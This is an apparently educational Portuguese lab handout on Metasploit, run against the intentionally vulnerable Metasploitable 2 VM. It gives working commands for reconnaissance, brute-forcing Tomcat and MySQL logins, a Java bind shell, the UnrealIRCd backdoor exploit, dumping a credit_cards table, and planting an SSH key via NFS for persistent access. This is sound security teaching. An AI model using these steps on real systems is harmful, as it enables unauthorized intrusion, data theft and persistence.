Aula Metasploit. I. Escopo. Dica

Tamanho: px
Começar a partir da página:

Download "Aula Metasploit. I. Escopo. Dica"

Transcrição

1 Aula Metasploit I. Escopo As estações responsáveis pelos ataques utilizam a distribuição GNU/Linux Backtrack 5 R3, uma distribuição GNU/Linux baseada no Ubuntu LTS. Esta versão foi lançada em 13/Ago/2012 1, no momento a mais recente deste pacote de ferramentas. O sistema alvo utilizado neste exercício é o Metasploitable 2. Uma distribuição GNU/Linux desenvolvida especialmente para servir de alvo na execução de testes de segurança. Ela utiliza uma distribuição Ubuntu com diversas aplicações desatualizadas e mal configuradas. A versão utilizada foi lançada em 21/05/ Virtual Box O host com a instalação do Backtrack será executado como uma máquina virtual utilizando o Virtualbox. Abra a janela do Virtualbox, mas antes de executar o Backtrack clique com o botão direito sobre a máquina virtual e clique em Configurações: Na janela de Configurações, vá até a opção Rede e certifique-se de que o Adaptador 1 com a opção Conectado a: Placa em modo Bridge. Em avançado, clique algumas vezes no botão ao lado do campo Endereço MAC, garantindo dessa forma que todos possuam endereços MAC diferentes uns dos outros na mesma rede. Dica Sempre que aparecer x.x.x.x, substitua automaticamente pelo IP do host que será alvo do ataque. Quando x.x.x.y substitua pelo IP do host atacante (Backtrack). A representação do endereço x.x.x.0/24 identifica a utilização do IP da rede

2 No momento de executar algum comando, verifique se está no local correto. Quando o comando indicar o símbolo #, significa que você deve estar na linha de comando do Linux. Caso o comando indique outro prefixo, como por exemplo, mysql > ou msf >, você deve estar na linha de comando desse aplicativo. Comandos Básicos do Linux cat [arquivo] : lista o conteúdo do arquivo. cat /etc/issue : mostra detalhes sobre a distribuição utilizada. cd [pasta] : entra na pasta especificada. cp [origem] [destino] : copia um arquivo. cp -R [pasta_origem] [destino] : copia uma pasta e todo seu conteúdo. ls : listas arquivos e pastas em um diretório. ls -l : listar arquivos e pastas exibindo os detalhes. ls -la : listar arquivos e pastas incluindo ocultos. mkdir [pasta] : cria uma pasta com o nome indicado mv [origem] [destino] : move/renomeia arquivo ou pasta. passwd : altera a senha do usuário atual. passwd [login] : altera a senha de outro usuário. pwd : mostra o caminho da pasta atual. uname -a : mostra informações sobre o sistema. II. Mapeamento dos alvos Identificação de hosts ping Conforme ALI (2011), o ping é a ferramenta mais famosa para verificar a disponibilidade de um host. Seu funcionamento se dá pelo envio de pacotes ECHO REQUEST ao host de destino, caso o host em questão esteja disponível ele retornará um pacote ECHO REPLY, o protocolo utilizado é o ICMP (Internet Control Message Protocol). Em uma execução bem sucedida é possível verificar se um host conhecido está disponível. No exemplo abaixo foram enviados três pacotes ICMP ECHO REQUEST e todos os três foram respondidos (ICMP ECHO REPLY). A quantidade de pacotes é definida pelo parâmetro '-c'. # ping -c 3 x.x.x.x (IP do host alvo) PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=69.9 ms 2

3 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=1.38 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=1.18 ms --- x.x.x.x ping statistics packets transmitted, 3 received, 0% packet loss, time 2004ms rtt min/avg/max/mdev = 1.183/24.165/69.929/ ms fping Quando não se conhece o endereço IP do alvo cuja disponibilidade deve ser testada, é preciso utilizar ferramentas capazes de gerar uma lista de endereços para o envio do ICMP ECHO REQUEST. O fping faz isso através do parâmetro '-g', no exemplo abaixo será utilizado também o parâmetro '-c 1' para enviar uma única solicitação para cada host da lista. Os comandos abaixo geram exatamente a mesma lista, o primeiro utiliza o endereço de sub-rede e o segundo utiliza um endereço inicial e final para a geração da lista. Escolha um e execute: # fping -c 1 -g x.x.x.0/24 (IP da rede alvo) # fping -c 1 -g x.x.x.1 x.x.x.254 (IP inicial e final da rede) Para cada host cuja resposta não for obtida é apresentada cada uma das linhas, conforme segue: ICMP Host Unreachable from x.x.x.x for ICMP Echo sent to x.x.x.y x.x.x.y : xmt/rcv/%loss = 1/0/100% Para cada host ativo, e respondendo a requisições, são geradas linhas como as que seguem: x.x.x.x : [0], 84 bytes, 5.80 ms (5.80 avg, 0% loss) x.x.x.x : xmt/rcv/%loss = 1/1/0%, min/avg/max = 5.80/5.80/5.80 Analisando as linhas acima seria possível afirmar que o host x.x.x.y não está ativo e o host x.x.x.x está. Identificação dos Serviços nmap Para que o nmap identifique com mais precisão as informações do sistema alvo, é importante executar a atualização de sua base de dados com o comando abaixo: # nmap --script-updatedb O nmap também possibilita identificar os hosts disponíveis em uma rede utilize o comando abaixo: # nmap -sp x.x.x.0/24 A resposta do comando será algo como: Nmap scan report for x.x.x.x Host is up ( s latency). MAC Address: 08:00:27:18:E5:1E (Cadmus Computer Systems) Nmap scan report for x.x.x.y Host is up. Nmap done: 256 IP addresses (2 hosts up) scanned in seconds O parâmetro '-sp' solicita um Ping Scan, e retorna a lista de hosts ativos na rede especificada e ainda identifica o endereço físico da placa de rede (MAC Address). Compare a quantidade de hosts retornados 3

4 pelo comando fping e pelo nmap. O nmap localizou mais por utilizar o protocolo TCP, enquanto o fping utiliza o ICMP, protocolo bloqueado em diversos host para evitar ataques como o ping da morte. A forma mais simples de execução da ferramenta nmap para mapear os serviços em execução em um host é: # nmap x.x.x.x (IP do host alvo) A saída do comando será algo parecido com: Nmap scan report for x.x.x.x Host is up (0.0051s latency). Not shown: 977 closed ports PORT 21/tcp 22/tcp 23/tcp 25/tcp 53/tcp 80/tcp STATE SERVICE open ftp open ssh open telnet open smtp open domain open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X /tcp open irc 8009/tcp open ajp /tcp open unknown MAC Address: 08:00:27:18:E5:1E (Cadmus Computer Systems) Nmap done: 1 IP address (1 host up) scanned in seconds Pela utilização padrão do nmap, a ferramenta testa cada porta apenas para verificar os serviços que estão em execução e monitorando cada uma das portas, porém sem completar a conexão. É como telefonar, esperar que atendam e desligar sem saber se quem atendeu foi uma pessoa ou uma secretária eletrônica. Portanto, o nome dos serviços sugeridos por ele são apenas suposições de acordo com o número da porta. Com o parâmetro abaixo, o nmap tenta capturar o nome do serviço que realmente está em execução nas portas do host alvo e suas respectivas versões: # nmap -sv x.x.x.x (IP do host alvo) A saída do comando será: Nmap scan report for x.x.x.x 4

5 Host is up (0.0059s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd /tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND /tcp open http Apache httpd ((Ubuntu) DAV/2) 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) 139/tcp open netbios-ssn WORKGROUP) 445/tcp open netbios-ssn WORKGROUP) 512/tcp open exec 513/tcp open login 514/tcp open shell? 1099/tcp open rmiregistry 1524/tcp open ingreslock? Samba smbd 3.X (workgroup: Samba smbd 3.X (workgroup: netkit-rsh rexecd GNU Classpath grmiregistry 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003) 2121/tcp open ftp ProFTPD /tcp open mysql MySQL a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB /tcp open vnc VNC (protocol 3.3) 6000/tcp open X /tcp open irc 8009/tcp open ajp13? 8180/tcp open http 1.1 (access denied) Unreal ircd Apache Tomcat/Coyote JSP engine O resultado deste comando é mais demorado pelo fato do nmap realizar uma conexão em cada uma das portas. Agora, com os nomes dos softwares em execução e suas respectivas versões, o conhecimento sobre o alvo aumenta. O nmap também pode tentar detectar o sistema operacional em execução no host alvo. Execute o comando abaixo e analise o resultado: # nmap -O x.x.x.x (IP do host alvo) Na saída desse comando, os serviços em execução são repetidos e ao final é apresentado o resultado do provável sistema operacional do alvo: Nmap scan report for x.x.x.x Host is up (0.0013s latency). Not shown: 977 closed ports PORT 21/tcp 22/tcp 23/tcp... STATE SERVICE open ftp open ssh open telnet 6667/tcp open irc 5

6 8009/tcp open ajp /tcp open unknown MAC Address: 08:00:27:18:E5:1E (Cadmus Computer Systems) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux Network Distance: 1 hop O comando acima retorna que o sistema utilizado é um Linux com kernel entre as versões e O Metasploitable 2 utiliza, mais precisamente, a versão do kernel Linux, portanto o resultado está dentro da expectativa. Para um resultado ainda mais completo, teste o comando: # nmap -v -A x.x.x.x (IP do host alvo) Sua saída é a seguinte:... Nmap scan report for x.x.x.x Host is up (0.0044s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd _ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) ssh-hostkey: :0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) _ :56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd _smtp-commands: metasploitable.localdomain, PIPELINING, SIZE , VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, ssl-cert: Subject: commonname=ubuntu804- base.localdomain/organizationname=ocosa/stateorprovincename=there is no such thing outside US/countryName=XX Issuer: commonname=ubuntu804- base.localdomain/organizationname=ocosa/stateorprovincename=there is no such thing outside US/countryName=XX Public Key type: rsa Public Key bits: 1024 Not valid before: :07:45 Not valid after: :07:45 MD5: dcd9 ad90 6c8f 2f73 74af 383b _SHA-1: ed bf d5dc b4 98da 2d4d 31c6 53/tcp open domain ISC BIND dns-nsid: _ bind.version: /tcp open http Apache httpd ((Ubuntu) DAV/2) 6

7 _http-methods: No Allow or Public header in OPTIONS response (status code 200) _http-title: Metasploitable2 - Linux 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) rpcinfo: program version port/proto service /tcp rpcbind /udp rpcbind ,3,4 2049/tcp nfs ,3,4 2049/udp nfs ,2, /udp mountd ,2, /tcp mountd ,3, /udp nlockmgr ,3, /tcp nlockmgr /udp status _ /tcp open netbios-ssn WORKGROUP) 445/tcp open netbios-ssn WORKGROUP) 512/tcp open exec 513/tcp open login? 514/tcp open shell? 1099/tcp open rmiregistry 1524/tcp open ingreslock? 44437/tcp status Samba smbd 3.X (workgroup: Samba smbd 3.X (workgroup: netkit-rsh rexecd GNU Classpath grmiregistry 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003) 2121/tcp open ftp ProFTPD /tcp open mysql mysql-info: Protocol: 10 Version: a-3ubuntu5 Thread ID: 10 MySQL a-3ubuntu5 Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection Status: Autocommit _Salt: ABf[xg{Tsd bwma86gcx 5432/tcp open postgresql PostgreSQL DB /tcp open vnc VNC (protocol 3.3) vnc-info: Protocol version: 3.3 Security types: _ Unknown security type ( ) 6000/tcp open X /tcp open irc (access denied) Unreal ircd irc-info: Server: irc.metasploitable.lan Version: Unreal irc.metasploitable.lan Lservers/Lusers: 0/1 Uptime: 0 days, 1:50:36 Source host: 80911CEB.D3975B40.7B559A54.IP _Source ident: OK nmap 7

8 8009/tcp open ajp13? 8180/tcp open http Apache Tomcat/Coyote JSP engine MAC Address: 08:00:27:18:E5:1E (Cadmus Computer Systems) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux Uptime guess: days (since Sun Oct 21 17:00: ) Network Distance: 1 hop... Host script results: nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> Names METASPLOITABLE<00> Flags: <unique><active> METASPLOITABLE<03> Flags: <unique><active> METASPLOITABLE<20> Flags: <unique><active> \x01\x02 MSBROWSE \x02<01> Flags: <group><active> WORKGROUP<00> Flags: <group><active> WORKGROUP<1d> Flags: <unique><active> _ WORKGROUP<1e> Flags: <group><active> smb-os-discovery: OS: Unix (Samba Debian) NetBIOS computer name: Workgroup: WORKGROUP _ System time: :46:51 UTC-4 TRACEROUTE HOP RTT ADDRESS ms Este resultado é ainda mais demorado, porém com ele foi possível obter informações sobre versões de softwares não identificados anteriormente e detalhes sobre serviços específicos, como FTP, SMB entre outros. Com isso torna-se viável a exploração de falhas específicas das versões instaladas. Com este último comando foi possível identificar que o FTP aceita conexões anônimas, que a versão do Unreal ircd é a Incluindo a identificação do sistema operacional e a possível versão do Kernel Linux. III. Identificação de vulnerabilidades Unreal IRC Com as informações obtidas no tópico anterior, agora é possível pesquisar quais softwares do host alvo possuem vulnerabilidades conhecidas. Como forma de exemplo, em uma rápida pesquisa no Google pelo termo Unreal exploit, obtêm-se como primeiro resultado a página do Metasploit, conforme tela abaixo: 8

9 Figura 1: Seção de exploits do site Metasploit Com este resultado é possível descobrir que esta versão do Unreal IRC possui uma Backdoor, e seu nível de exploração é categorizado como 'Excelente'. IV. Exploração Metasploit Metasploit é uma plataforma que fornece a infraestrutura para automatizar tarefas. Possui diversos módulos complementares e pode ser utilizado de diversas formas para auxiliar em um teste de invasão. (Kennedy et al. 2011) O Metasploit possui mais de uma opção de interface, utilizaremos o MSFConsole por ser o mais simples e versátil do framework (Kennedy et al. 2011), oferecendo diversos recursos e ferramentas. Com ela é possível executar exploits, carregar módulos auxiliares, efetuar varredura, enumeração e rodar exploits em massa contra alvos específicos ou redes inteiras. Primeiro acesso Antes de utilizar o metasploit é recomendado atualizar seu banco de dados com o comando abaixo: # msfupdate O comando abaixo entra na interface de console do Metasploit: # msfconsole Password guessing Tomcat O servidor Apache Tomcat é um servidor web Java. Sua execução foi identificada pela linha abaixo, gerada pelo nmap: 8180/tcp open http 1.1 Apache Tomcat/Coyote JSP engine Dentro do console do metasploit é possível utilizar o comando search para identificar os módulos disponíveis: msf > search tomcat Dentre vários resultados um deles será: 9

10 Name... Description auxiliary/scanner/http/tomcat_mgr_login... Tomcat Application Manager Login Utility Para fazer uso deste módulo utiliza-se o comando: msf > use auxiliary/scanner/http/tomcat_mgr_login Cada módulo possui parâmetros necessários à sua execução, com o comando abaixo é possível obter uma lista deles: msf auxiliary(tomcat_mgr_login) > show options Perceba que os parâmetros abaixo já estão preenchidos: PASS_FILE USERPASS_FILE USER_FILE Pode deixá-los como estão, no momento serão configurados apenas os parâmetros abaixo. Para cada parâmetro que deve ser configurado deverá ser utilizado o comando set: msf auxiliary(tomcat_mgr_login) > set RHOSTS x.x.x.x (IP alvo) msf auxiliary(tomcat_mgr_login) > set RPORT 8180 (Porta do Tomcat) Execute novamente o comando show options e verifique se os parâmetros foram corretamente preenchidos. Por fim é utilizado o comando exploit que executa o módulo contra o alvo especificado acima: msf auxiliary(tomcat_mgr_login) > exploit Este módulo executa um ataque por palavras de dicionário, utilizando os arquivos indicados nas variáveis indicadas acima. Neste ataque uma das combinações utilizadas poderá ser aceita pelo servidor:... [*] :8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root' [-] :8180 TOMCAT_MGR - [15/56] - /manager/html [Apache- Coyote/1.1] [Tomcat Application Manager] failed to login as 'root' [*] :8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat' [+] [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat' [*] :8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both' [-] :8180 TOMCAT_MGR - [17/56] - /manager/html [Apache- Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'... A linha em destaque informa um login e senha aceitos, dessa forma outros ataques podem ser perpetrados: msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set RHOST x.x.x.x msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 Neste módulo é preciso utilizar o parâmetro PAYLOAD, para obter uma lista de payloads compatíveis com o módulo em questão utiliza-se o comando 10

11 msf exploit(tomcat_mgr_deploy) > show payloads Conforme Kennedy e outros (2011), payload identifica o código que o módulo deve executar e que deve ser entregue ao alvo. No caso será utilizado um prompt de comando feito em java e como o Tomcat é um servidor Java, o prompt será executado: msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/shell/bind_tcp msf exploit(tomcat_mgr_deploy) > exploit O comando acima fornecerá um prompt de comando para o usuário tomcat que poderá executar programas e abrir arquivos aos quais ele possua acesso. MySQL É um dos Sistemas Gerenciadores de Banco de Dados (SGBD) mais populares do mundo. Possui uma versão distribuída como Software Livre e uma versão comercial. O atual responsável pelo seu desenvolvimento é a Oracle. Acesse o msfconsole e digite o comando abaixo: msf > search mysql São mostrados todos os módulos com a palavra mysql em seu nome, ou seja, os módulos que trabalham com esse banco de dados. Neste momento o módulo utilizado será o seguinte: msf > use auxiliary/scanner/mysql/mysql_login Liste os parâmetros necessários para executar este módulo: msf auxiliary(mysql_login) > show options Verifique os parâmetros disponíveis, preencha com as opções abaixo: msf > set RHOSTS x.x.x.x (IP destino) msf > set USERNAME root msf > set PASS_FILE /opt/metasploit/msf3/data/wordlists/unix_passwords.txt É possível listar os parâmetros novamente para verificar se estão preenchidos (show options). E então, execute o módulo: msf > exploit O módulo tentará se conectar ao banco de dados MySQL do host x.x.x.x utilizando o usuário root, primeiro com a senha em branco, em seguida com cada uma das palavras do arquivo unix_passwords.txt como senha. É possível ainda configurar o parâmetro USER_FILE com o arquivo abaixo, com isso todas as linhas do arquivo serão testadas como login. É um teste demorado, porém pode ser a melhor maneira de descobrir um login e senha válidos: /opt/metasploit/msf3/data/wordlists/unix_users.txt Agora abra outra janela de terminal e tente se conectar ao banco de dados utilizando o usuário root e a senha descoberta: (IP alvo) # mysql -h x.x.x.x -u root -psenha Alguns comandos úteis para obter informações de um banco MySQL Server. Liste os databases existentes: mysql> show databases; Escolha um database, por exemplo: 11

12 mysql> use owasp10; Liste todas as tabelas do database escolhido: mysql> show tables; A título de exemplo, liste os registros de uma das tabelas: mysql> select * from credit_cards; Agora liste os registros de uma das tabelas salvando o resultado no arquivo indicado: mysql> select * from credit_cards -> into outfile '/tmp/arquivo_[seunome].txt'; Um arquivo é gerado com o conteúdo da tabela, porém este arquivo está no host alvo. Ainda precisaremos copiá-lo para o computador local. Acesso ao prompt Unreal IRC Com o comando a seguir, é possível buscar os módulos com os exploits do Unreal IRC: msf > search unreal irc O módulo encontrado é: exploit/unix/irc/unreal_ircd_3281_backdoor Utilize o módulo: msf > use exploit/unix/irc/unreal_ircd_3281_backdoor Mostrar os parâmetros para sua utilização msf exploit(unreal_ircd_3281_backdoor) > show options Abaixo os parâmetros com a indicação de que são obrigatórios: Name Current Setting Required Description RHOST yes The target address RPORT 6667 yes The target port Defina o host alvo com o comando: msf exploit(unreal_ircd_3281_backdoor) > set RHOST x.x.x.x Explorar: msf exploit(unreal_ircd_3281_backdoor) > exploit Resultado: [*] Started reverse double handler [*] Connected to x.x.x.x: :irc.metasploitable.lan NOTICE AUTH :*** Looking up your hostname... :irc.metasploitable.lan NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... 12

13 [*] Command: echo aredlp8ml4sca5t6; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "aredlp8ml4sca5t6\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (x.x.x.x:4444 -> x.x.x.y:57897) at :23:27 Acesso ao prompt de comando com permissões de administrador (no Linux, usuário root). Pastas compartilhadas NFS Uma das linhas do resultado do nmap indica que a porta 2049 está sendo utilizada. 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003) Esta porta se trata do serviço de compartilhamento de arquivo NFS. Com o comando abaixo é possível verificar quais pastas estão sendo compartilhadas pelo protocolo: # showmount -e x.x.x.x (IP do host alvo) Export list for x.x.x.x: / * Com essa informação em mãos, é possível montar a pasta raiz do servidor em um ponto da máquina local: # mkdir /tmp/mnt # mount -t nfs x.x.x.x:/ /tmp/mnt -o nolock Com esta pasta compartilhada é possível copiar arquivos entre o computador invasor e o computador da vítima. Acesse a pasta tmp do host alvo: # cd /tmp/mnt/tmp Copie o arquivo gerado pelo comando SQL: # cp arquivo_[seunome].txt /root Manutenção do acesso SSH Primeiramente, tente conectar-se ao servidor da vítima por SSH: # ssh O servidor pedirá a senha do usuário root, como não temos, não conseguiremos logar na máquina remota. Para que o login SSH funcione, gere uma chave SSH: # ssh-keygen Esta chave identifica o computador que você está utilizando. Adicione essa chave gerada como uma chave de confiança no servidor remoto, utilizando a pasta compartilhada que foi montada anteriormente: # cat /root/.ssh/id_rsa.pub >> /tmp/mnt/root/.ssh/authorized_keys 13

14 Agora tente logar novamente utilizando SSH: # ssh Dessa vez a conexão torna-se possível devido à relação de confiança criada ao copiar a chave do host invasor para o host alvo. Com isso já temos uma backdoor sempre que precisar entrar no servidor remoto. Copiando arquivos De dentro do host invasor Copie um arquivo do host alvo para o host invasor utilizando a pasta compartilhada montada (/tmp/mnt): cp [origem] [destino] # cp /tmp/mnt/tmp/arquivo.txt /root É possível ainda copiar um arquivo utilizando o SSH: scp [origem] [destino] scp /pasta_local # scp /root De dentro do host alvo Agora vamos copiar um arquivo para o host invasor, estando dentro do host alvo. Para acessar o host Backtrack via SSH pela primeira vez, execute no Backtrack o comando: # sshd-generate # restart ssh Caso apresente erro no segundo comando, execute: # /etc/init.d/ssh restart A partir de agora o servidor SSH está habilitado no Bracktrack, podendo ser acessado para copiar arquivos com o comando abaixo: scp /pasta/arquivo # scp /home/user/[arquivo] Para desmontar a pasta compartilhada do servidor alvo, utilize: # umount /tmp/mnt Treino Acesse a pasta /home/user do host alvo e copie o arquivo.pdf e.txt para /root do Backtrack. Referências WILHELM, Thomas. Professional Penetration Testing: creating and operating a formal hacking lab. Burlington, Massachusetts: Syngress Wiki Backtrack Linux. Getting started with OpenVas. 1 June 2011, at 23:25. <Acesso em: 09/03/2012>. Disponível em: ALI, Shakeel & HERIYANTO, Tedi. BackTrack 4: Assuring Security by Penetration Testing. Packt Publishing. Packt Publishing: Birmingham, UK

15 KENNEDY, David; O GORMAN, Jim; KEARNS, Devon; e AHARONI, Mati. Metasploit: The Penetration Tester s Guide. No Starch Press. San Francisco, CA

TRABALHO INTRUSÃO DE REDES

TRABALHO INTRUSÃO DE REDES TRABALHO INTRUSÃO DE REDES Software Metasploit Framework O que é > Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento,

Leia mais

Ademar de Souza Reis Jr. http://www.ademar.org. XII Congresso C. Computação Bolívia Tarija Bolívia Outubro 2005

Ademar de Souza Reis Jr. <ademar@conectiva.com.br> http://www.ademar.org. XII Congresso C. Computação Bolívia Tarija Bolívia Outubro 2005 TCP/IP e Service Fingerprinting Como descobrir informações a respeito de um host remoto explorando detalhes da implementação da pilha TCP/IP e seus serviços Ademar de Souza Reis Jr.

Leia mais

Metasploit Sabe o que é?

Metasploit Sabe o que é? Metasploit Sabe o que é? é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo atacar as falhas de segurança existentes nos mais

Leia mais

Redes. Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004

Redes. Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004 Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004 O ICMP - - é um protocolo que faz parte da pilha TCP/IP, enquadrando-se na camada de rede (nível

Leia mais

1. Alguns protocolos básicos da pilha TCP/IP

1. Alguns protocolos básicos da pilha TCP/IP 1. Alguns protocolos básicos da pilha TCP/IP 1.1 Exemplo de subredes HUB ROTEADOR HUB 1.2 ICMP - Internet Control Message Protocol ICMP é um protocolo que roda sobre IP e é usado para comunicar diversas

Leia mais

Redes de computadores

Redes de computadores Redes de computadores Atividade realizada: Identificar serviços de portas aberta tanto na rede cabeada quanto wi-fi: Ferramenta utilizada para identificar serviços e portas abertas na rede foi o Nmap:

Leia mais

Manual de Acesso a Servidores SSH

Manual de Acesso a Servidores SSH UFF - Universidade Federal Fluminense Escola de Engenharia Curso de Engenharia de Telecomunicações Programa de Educação Tutorial Grupo PET-Tele Manual de Acesso a Servidores SSH Autor : Orientador: Vinicius

Leia mais

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo

Leia mais

Sistema Operacional Unidade 12 Comandos de Rede e Acesso Remoto

Sistema Operacional Unidade 12 Comandos de Rede e Acesso Remoto Sistema Operacional Unidade 12 Comandos de Rede e Acesso Remoto Curso Técnico em Informática SUMÁRIO INTRODUÇÃO... 3 Protocolo de rede... 3 Protocolo TCP/IP... 3 Máscara de sub-rede... 3 Hostname... 3

Leia mais

Laboratório - Acesso a dispositivos de rede com SSH

Laboratório - Acesso a dispositivos de rede com SSH Topologia Tabela de endereçamento Dispositivo Interface Endereço IP Máscara de subrede Gateway padrão Objetivos R1 G0/1 192.168.1.1 255.255.255.0 ND S1 VLAN 1 192.168.1.11 255.255.255.0 192.168.1.1 PC-A

Leia mais

Introdução ao Sistema. Características

Introdução ao Sistema. Características Introdução ao Sistema O sistema Provinha Brasil foi desenvolvido com o intuito de cadastrar as resposta da avaliação que é sugerida pelo MEC e que possui o mesmo nome do sistema. Após a digitação, os dados

Leia mais

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit.

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit. Unidade Curricular Segurança em Redes Prof. Eduardo Maroñas Monks Aluno Gérson Porciúncula Siqueira Roteiro de Laboratório Ferramentas de Segurança - Metasploit Objetivo: Analisar e demonstrar a aplicação

Leia mais

Universidade Federal do Rio Grande do Norte

Universidade Federal do Rio Grande do Norte Universidade Federal do Rio Grande do Norte Redes de Computadores - Camada de Aplicação Curso de Engenharia de Software Prof. Marcos Cesar Madruga/Thiago P. da Silva Material basedado em [Kurose&Ross 2009]

Leia mais

Administração de Redes Redes e Sub-redes

Administração de Redes Redes e Sub-redes 1 MINISTÉRIO DA EDUCAÇÃO SECRETARIA DE EDUCAÇÃO PROFISSIONAL E TECNOLÓGICA INSTITUTO FEDERAL DE EDUCAÇÃO, CIÊNCIA E TECNOLOGIA CAMPUS SÃO JOSÉ SANTA CATARINA Administração de Redes Redes e Sub-redes Prof.

Leia mais

Esta nota apresenta como definir o SSL VPN no roteador Vigor.

Esta nota apresenta como definir o SSL VPN no roteador Vigor. Como configurar o SSL para VPN Esta nota apresenta como definir o SSL VPN no roteador Vigor. Dividiremos o tutorial em cinco partes: Parte A: Como criar uma conta de SSL. Parte B: Como configurar a segurança

Leia mais

Sistema Operacional Unidade 13 Servidor Samba. QI ESCOLAS E FACULDADES Curso Técnico em Informática

Sistema Operacional Unidade 13 Servidor Samba. QI ESCOLAS E FACULDADES Curso Técnico em Informática Sistema Operacional Unidade 13 Servidor Samba Curso Técnico em Informática SUMÁRIO INTRODUÇÃO... 3 INSTALANDO O SAMBA... 3 Verificando a versão... 3 Criando uma cópia do servidor samba original... 3 COMPARTILHAMENTOS

Leia mais

Projeto e Instalação de Servidores Servidores Linux Aula 7 Samba, SSH e Backup

Projeto e Instalação de Servidores Servidores Linux Aula 7 Samba, SSH e Backup Projeto e Instalação de Servidores Servidores Linux Aula 7 Samba, SSH e Prof.: Roberto Franciscatto Samba Samba Samba Samba Servidor de compartilhamento de arquivos e recursos de rede É compatível com

Leia mais

Segredos do Hacker Ético

Segredos do Hacker Ético Marcos Flávio Araújo Assunção Segredos do Hacker Ético 2 a Edição Visual Books Sumário Prefácio... 21 Introdução... 23 1 Entendendo o Assunto... 25 1.1 Bem-vindo ao Obscuro Mundo da Segurança Digital...25

Leia mais

Redes de Computadores

Redes de Computadores s de Computadores s de Computadores s de Computadores 2 1 Roteamento como visto cada gateway / host roteia mensagens não há coordenação com outras máquinas Funciona bem para sistemas estáveis e sem erros

Leia mais

EN3611 Segurança de Redes Prof. João Henrique Kleinschmidt Prática Wireshark Sniffer de rede

EN3611 Segurança de Redes Prof. João Henrique Kleinschmidt Prática Wireshark Sniffer de rede EN3611 Segurança de Redes Prof. João Henrique Kleinschmidt Prática Wireshark Sniffer de rede Entregar um relatório contendo introdução, desenvolvimento e conclusão. A seção desenvolvimento pode conter

Leia mais

Tutorial de TCP/IP Parte 21 Roteiro Para Resolução de Problemas

Tutorial de TCP/IP Parte 21 Roteiro Para Resolução de Problemas Introdução: Tutorial de TCP/IP Parte 21 Roteiro Para Resolução de Problemas Prezados leitores, esta é a primeira parte, desta segunda etapa dos tutoriais de TCP/IP. As partes de 01 a 20, constituem o módulo

Leia mais

PARANÁ GOVERNO DO ESTADO

PARANÁ GOVERNO DO ESTADO PROTOCOLOS DA INTERNET FAMÍLIA TCP/IP INTRODUÇÃO É muito comum confundir o TCP/IP como um único protocolo, uma vez que, TCP e IP são dois protocolos distintos, ao mesmo tempo que, também os mais importantes

Leia mais

O Nmap - Network Mapper é uma ferramenta de código aberto para exploração de rede e auditoria de segurança.

